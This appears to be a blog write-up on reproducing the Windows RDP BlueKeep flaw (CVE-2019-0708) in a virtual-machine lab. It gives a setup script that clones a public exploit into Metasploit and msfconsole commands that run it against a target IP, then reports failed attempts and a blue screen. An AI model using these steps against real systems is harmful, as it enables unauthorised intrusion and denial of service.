Shulou(Shulou.com)05/31 Report--
Many newcomers are unclear about how CVE-2019-0708 is reproduced and how to defend against it. To help with that, this article explains it in detail; anyone who needs it can follow along, and hopefully you will gain something.
I. Description of the vulnerability
On May 15, 2019, a high-risk vulnerability in Windows series servers was disclosed. It affects a wide range of systems, such as Windows 2003, Windows 2008, Windows 2008 R2, and Windows XP. The server is exploited through the Remote Desktop port, 3389.
II. Method of exploitation
For the convenience of testing, here is a script I wrote myself; follow the steps below on a Kali Linux system.
1. Create a script file *.sh and give it the executable attribute with chmod +x *.sh
2. Copy the following code directly into *.sh, then run ./*.sh to prepare the attack environment. (Note: the script updates MSF, which is a must! Otherwise the framework will not load.)
# Update your MSF
apt-get update
apt-get install metasploit-framework
# Download cve-2019-0708
git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git
# Mkdir for cve
mkdir -p /usr/share/metasploit-framework/lib/msf/core/exploit/
mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/
mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
# Copy .rb to target dir
cd cve_2019_0708_bluekeep_rce/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
Once downloaded, the CVE-2019-0708 package contains two modules: a scanning module, cve_2019_0708_bluekeep, and an attack module, cve_2019_0708_bluekeep_rce, both of which can be used directly.
3. Continue with the following to start the test
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.80.111 (target IP)
set target 3 (the target environment; which one to use is shown in the second figure below, or just type info under the module)
run
III. Start testing (all the systems are virtual machines)
1. Test winxp-sp3
Yes, XP is as steady as Mount Tai! It hardly has any patches, yet it holds up!
2. Test win7-x64-sp1
Just as steady. Is this the reality? It doesn't work at all.
3. Test server2008-x64-R2-SP1
Well, not only did I not get a shell, it also blue-screened; I changed a parameter, and then it became unresponsive.
4. Test server-2003 Enterprise Edition
It won't work. Seems to know something...
5. Test win10-x64 Professional Edition
Of course, you have to try it on your own machine. It doesn't work at all without a patch.
IV. Closing remarks
Although this test was not successfully reproduced, after all the twists and turns one phrase comes to mind: "not acclimatized to the local soil and water". Many of the penetration tests I have done ran into exactly this: the issue can only be reproduced by finding a specific system and applying a specific configuration. Some even require a specific system language.
In fact, this CVE also needs something configured on 2008 R2 to succeed, but that is too far from a real environment, so I did not configure it and only tested the stock systems, and … It is recommended not to use this in a penetration test; nobody can stand a blue screen!